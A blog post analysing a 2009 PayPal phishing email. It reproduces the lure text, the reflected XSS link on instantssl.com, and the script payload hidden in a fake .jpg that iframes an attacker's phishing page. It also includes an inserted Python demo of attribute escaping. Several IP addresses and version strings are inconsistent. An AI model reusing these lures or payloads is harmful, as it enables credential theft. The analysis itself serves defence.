I received a lot of positive feedback on my blog post “Analysis of a Real World Hacking Attempt”, and after a recent email that tried to direct me to a PayPal phishing site, I decided it was again time to give a little insight into the latest phishing schemes out there...
The email read something like this:
Information about your account:
Attention! Your PayPal account was limited!
As part of our security measures, we regularly check the work of the screen PayPal. We have requested information from you for the following reason:
Our system has detected unusual charges to a credit card linked to your PayPal account.
Reference Number: PP-259-187-991
This is the last reminder to log into PayPal, as soon as possible. Once you connect. PayPal will provide measures to restore access to your account.
Once connected, follow the steps to activate your account. We appreciate your understanding as we work to ensure security.
Clik Here To Activate
We appreciate your attention to this issue. Please understand that this is a security measure designed to protect you and your account. We apologize for any inconvenience ..
Department review PayPal accounts
Copyright © 1999-2009 PayPal. All rights reserved.
PayPal FSA Register Number: 226056.
Yes, they actually misspelled “click” on the phishing link, along with other typos such as the double period.
The link’s target location was:
This is a textbook reflected XSS flaw, easily seen from the quote and closing bracket injected into the orderNumber parameter:
https://secure.instantssl.com/products/passwordResetRequest?orderNumber=" > [XSS HERE]
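To show why that link works, here is an added example (not code from the post, and not instantssl's code) that reflects an orderNumber query parameter into a double-quoted attribute the way a vulnerable page would, beside the hardened version. The template string is a hypothetical stand-in; the URL is the one the post shows, with the injected characters percent-encoded. The round-trip check parses the rendered form the way a browser would and reports whether the parameter survived purely as an attribute value or spilled out as markup.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the password-reset form's template (hypothetical;
# not instantssl's code). All that matters is that a query parameter is
# reflected into a double-quoted attribute value.
TEMPLATE = '<input type="text" name="orderNumber" value="{value}">'


def order_number_from_url(url: str) -> str:
    """Pull the orderNumber query parameter out of a request URL, URL-decoded."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("orderNumber", [""])[0]


def render_unescaped(order_number: str) -> str:
    """Vulnerable rendering: the parameter lands in the attribute verbatim."""
    return TEMPLATE.format(value=order_number)


def render_escaped(order_number: str) -> str:
    """Hardened rendering: HTML-escape, quotes included, before interpolating."""
    return TEMPLATE.format(value=html.escape(order_number, quote=True))


class _FormShape(HTMLParser):
    """Records the parsed value attribute of each <input>, plus any text that
    ended up outside a tag, which is where injected markup lands once the
    attribute has been closed early."""

    def __init__(self):
        super().__init__()
        self.input_values = []
        self.stray_text = ""

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.input_values.append(dict(attrs).get("value"))

    def handle_data(self, data):
        self.stray_text += data


def value_round_trips(rendered: str, original: str) -> bool:
    """True when a browser-style parse of the rendered form still sees exactly
    one <input> whose value is the original string and nothing spilled outside."""
    parser = _FormShape()
    parser.feed(rendered)
    parser.close()
    return parser.input_values == [original] and parser.stray_text.strip() == ""


if __name__ == "__main__":
    # The post's link target, with the injected characters percent-encoded.
    url = ("https://secure.instantssl.com/products/passwordResetRequest"
           "?orderNumber=%22%20%3E%20%5BXSS%20HERE%5D")
    value = order_number_from_url(url)
    for label, render in (("unescaped", render_unescaped), ("escaped", render_escaped)):
        out = render(value)
        print(f"{label}: {out}")
        print("  parameter stayed inside the attribute:", value_round_trips(out, value))
```

With the unescaped template the `"` closes the attribute and the `>` closes the tag, so everything after it is parsed as page content; with `html.escape(..., quote=True)` the same input comes back out of the parser as the literal string `" > [XSS HERE]` and nothing else.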
If you look at http://220.127.116.11/xss1.jpg, it is actually an HTML file, not a JPEG image file.
Its contents are:
<img src="http://18.104.22.168/xss1.jpg" alt="http://22.214.171.124/xss1.jpg"/>
Firefox even treats it as an image, offering right-click options over it such as “copy image” and “copy image location”, despite it being a script target in an image tag.
Tricky... and if you save it locally and open it, you can see that the content of xss1.jpg is:
document.write("<iframe src='http://transgalaxyproducts.com/bbnse/webscr/webscr.php?cmd=_login-run' width='100%' height='100%' frameborder=0 scrolling=0></iframe>");
Then http://transgalaxyproducts.com/bbnse/webscr/webscr.php?cmd=_login-run is actually the location of the PayPal phishing site...
That was the story as of March 3rd...
Today, March 24th, the code served as the xss1.jpg image has changed, as seen below:
C:\>nc 126.96.36.199 80
GET /xss1.jpg HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 25 Mar 2009 00:58:00 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/188.8.131.5235
Last-Modified: Sat, 07 Mar 2009 10:22:10 GMT

document.write("<iframe src='http://184.108.40.206/cls/ws-cgi/365236545.html' width='100%' height='100%' frameborder=0 scrolling=0></iframe>");
The page at http://220.127.116.11/cls/ws-cgi/365236545.html seems to be a Craigslist listing for a truck in Atlanta, saved locally to the server. Odd, and I have no guesses as to why this would be there... your guess is as good as mine, but that’s the reality of what is going on out there. Hopefully this gave a little insight into some of the subtle tricks hackers are using to try to steal your information.
The IP 18.104.22.168 is in a block owned by Register.com out of New York and has an HTTP banner of "Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/22.214.171.12435".
Why there is a mirror of a Craigslist page is beyond me, but that’s where I’ll leave you to wonder on your own...